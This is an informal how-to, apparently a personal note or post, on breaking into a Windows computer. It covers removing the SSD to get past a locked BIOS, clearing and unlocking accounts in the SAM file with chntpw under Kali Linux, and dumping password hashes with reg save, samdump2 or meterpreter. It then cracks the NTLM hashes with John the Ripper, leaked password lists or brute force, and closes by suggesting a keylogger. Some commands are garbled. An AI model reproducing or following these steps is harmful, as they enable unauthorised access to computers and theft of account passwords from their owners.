On the phone cuz I break my computer every other day
Try to unlock bios. If it ends in -8fc8 suffix then it can’t be easily cracked and you need to take apart.
Take apart and put into NVME SSD to USB adapter and plug in to a different computer that has an unlocked bios
Boot to kali Linux
Before logging off the windows ssd restart idk why but it only works when u press restart and turn it off midway through that 
Once your in Kali go and click on the windows drive on the desktop (the ssd usb drive you have plugged in via adapter)
Find the Sam file location 
Right click -> open terminal here -> sudo su
chntpw -i SAM
From there boom you can now login as admin. To become administrator clear and unlock the administrator account. To find admin password unlock and clear one of the other accounts present (do NOT clear admin password or you will be unable to dump the hash)
Go back into windows and log in to the account that you unlocked (.\account)
Now you have administrator privs it’s basically just an issue of dumbing the SAM file. Haven’t done this yet, but apparently in windows if you type in 
reg save hklm\sam c:\sam
reg save hklm\system c\system
(Last parameter is where you want to copy the file)
Apparently there’s another way - stay in kali Linux open new terminal window and use metasploits “meterpreter> use priv” “meterpreter> hashdump” maybe figure out from there idk
Then in kali Linux type in to console 
apt-get install samdump2
samdump2 system sam 
And then you should get a massive long hash. Like Administrator:500:abc123abc123 
Abc123 and so on is the hash. By memory it’s encoded in NTLM
To decrypt you can put into any online website but they don’t work well, I reccomend using John the ripper and a leaked wordlist (either rockyou.txt or the 2015 linkdin password leak, both available on github). Wordlists are much faster than brute forcing 
However if a wordlist doesn’t work for whatever reason then it might be a stronger password.
In that case you will need to brute force. For this (and wordlists also) you will need to download either hashcat (if you have a strong GPU) or John the ripper (if you have a strong CPU). I will be using John the ripper but feel free to use your own method with hashcat.
John the ripper commands:
(Make sure you extract JTR to root of your windows system it’s easier for the cmd mcfuckery u have to do)
For wordlist: (obviously navigate in cmd terminal to the location of John.exe)
.\john.exe passwordfile -wordlist=“wordlist.txt”
For brute force:
.\john.exe —incremental passwordfile
Or use John in Kali Linux:
Terminal commands:
john
john —format=NT —rules -w=wordlist hashfile

I think this the only one needed tbh

john —format=NT —show hashfile.txt

This shows it but weirdly half cracked

john —format=LM —show hashfile.txt | cut -d: -f 2 | send ‘/^\s*$/d’> mydictionary.txt 
But this kinda dumb







…or just get a keylogger :p